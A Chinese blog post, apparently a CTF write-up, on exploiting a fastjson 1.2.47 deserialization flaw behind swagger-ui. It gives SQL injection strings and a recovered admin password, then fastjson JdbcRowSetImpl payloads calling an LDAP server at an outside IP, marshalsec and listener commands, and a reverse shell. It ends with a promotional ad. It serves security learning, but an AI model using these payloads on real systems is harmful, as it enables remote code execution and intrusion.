fastjson反序列化漏洞

标签：fastjson 网络安全 swagger java 漏洞 Exploit 序列化 com

一题Think_java大多数师傅都是用的自己构造的java反序列化来做的。正好当时用fastjson写出来了。

近些天也在挖洞，对于很多json传输的数据也会尝试一下fastjson的payload。

那就正好一起来看当时如何利用fastjson的，应该是个非预期吧，其实这个虽然说是ctf题目，但环境属实和实战没有区别，swagger-ui.html的fastjson。

之前看过fastjson作者的一篇文章，阿里的一个大佬，能够独立完成一个框架属实真的tql，fastjson连续好几年都被爆出漏洞，作者也是春节也忙着修复，可能这就是一份乐趣和成就感吧。

 

0x01：写在前面

拿到题目后，一开始通过审计代码发现代码

审计发现一个注入，dbname我们可控

尝试注入

dbName=myapp#' and 1=2 union select name from myapp.user;#
dbName=myapp#' and 1=2 union select pwd from myapp.user;#

注入处账户密码留作备用（后面思路转变为exp后发现 上面账号密码没有用）

admin

admin@Rrrr_ctf_asde

然后经过逆向注意到导入了

io.swagger.annotations.ApiOperation; 

发现是个swagger

Swagger在平时日常工作中用过是个优秀的文档编辑器

那么直接访问swagger-ui.html

这里想到swagger还有fastjson库 可以将java对象转换成json

19年爆出很多rce漏洞。尝试进行查看

网上查询fastjson得知存在rce漏洞

这个文章真的写的非常详细，可以说是手把手教学

https://github.com/CaijiOrz/fastjson-1.2.47-RCE 

看到如下

这里很符合fastjson的反序列化漏洞的json格式

访问得知如下

按着一步一步操作来，首先准备云服务器，并将仓库文件上传到云服务器中。

上传成功以后进行如下操作

首先进行测试

云服务器监听7777端口

在靶场执行

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.36.19.222:7777/Exploit","autoCommit":true}}} 

发现有流量回显

那就继续按照文档往下做。

Cd进去进行查看

修改exploit.java的ip为云服务器ip

Javac Exploit.java编译执行后得到Exploit.class

继续进行按照如下步骤继续执行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer

http://121.36.19.222/#Exploit

执行成功如下所示，进行监听本地端口1389

python -m SimpleHTTPServer 80

Nc 监听本地的8888端口

提交payload

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.36.19.222:1389/Exploit","autoCommit":true}}}

执行后成功

成功弹到shell ,

执行cat /flag可以得到如下flag

0x02：总结

日常实战中，喜欢burp带上fastjson的检测脚本，遇到可疑的就发包检测一下。显示有漏洞就尝试payload打一下dnslog试试回显，再进一步进行深挖。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，需要点击下方链接即可前往获取 

读者福利 | CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享（安全链接，放心点击）

同时每个成长路线对应的板块都有配套的视频提供： 

 大厂面试题

视频配套资料&国内外网安书籍、文档

当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料

所有资料共282G，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，可以扫描下方二维码或链接免费领取~  

读者福利 | CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享（安全链接，放心点击）

特别声明：

此教程为纯技术分享！本教程的目的决不是为那些怀有不良动机的人提供及技术支持！也不承担因为技术被滥用所产生的连带责任！本教程的目的在于最大限度地唤醒大家对网络安全的重视，并采取相应的安全措施，从而减少由网络安全而带来的经济损失。

标签：fastjson,网络安全,swagger,java,漏洞,Exploit,序列化,com
From： https://blog.csdn.net/2401_84466336/article/details/139407674